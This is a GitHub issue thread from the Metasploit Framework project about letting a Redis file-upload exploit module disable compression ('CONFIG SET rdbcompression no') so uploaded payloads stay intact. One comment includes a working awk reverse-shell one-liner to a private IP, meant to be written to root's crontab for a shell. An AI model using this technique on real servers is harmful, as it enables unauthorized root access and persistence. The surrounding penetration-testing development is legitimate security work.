### ISSUE TITLE
Disable redis compression during redis file upload

### ISSUE THREAD

**Issue by jhart-r7** [rapid7/metasploit-framework#6351]
When landing https://github.com/rapid7/metasploit-framework/pull/6319, I was thinking about how to overcome one of the problems with this module/vulnerability.  The upload is arbitrary but with the following restrictions:

 1.  The destination file and directory must be writable by the user running redis
 2.  The top of the file will contain the redis headers/magic that are present in any on-disk redis database file
 3.  After the top of the file, the remaining contents can become mangled by the compression that redis does by default

I don't believe 2a can be overcome given the nature of this bug, but 2b can be overcome by disabling compression, which can be achieved with `CONFIG set rdbcompression no`

@all3g, FYI.

**Comment by all3g** [comment]
Good, man. The **```rdbcompression```** option is yes by default, and redis can break our payload content. It 's useful to disable rdbcompression option. Ex. we can write 

    /bin/bash -c "awk 'BEGIN{s=\"/inet/tcp/0/192.168.1.101/5555\";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'"

to ```/var/spool/cron/crontabs/root ``` in remote server  with enough permissions, and the crontab can give us a shell.

**Comment by jhart-r7** [comment]
Fortunately, unless the command is remapped or hidden, 'CONFIG SET rdbcompression no' does work remotely and works around this problem.

**Comment by all3g** [comment]
Yeah, Do we add a ```DISABLE_RDB``` option for rdbcompression ?

**Comment by jhart-r7** [comment]
@all3g, yes, something like that, `true` by default and maybe it only disables it if it was detected that it was set in the first place, and that it sets it back to the original value after achieving upload (similar to what is done now but with tweaking `dir` and `dbfilename`)

**Comment by jhart-r7** [comment]
Fixed by #6357.
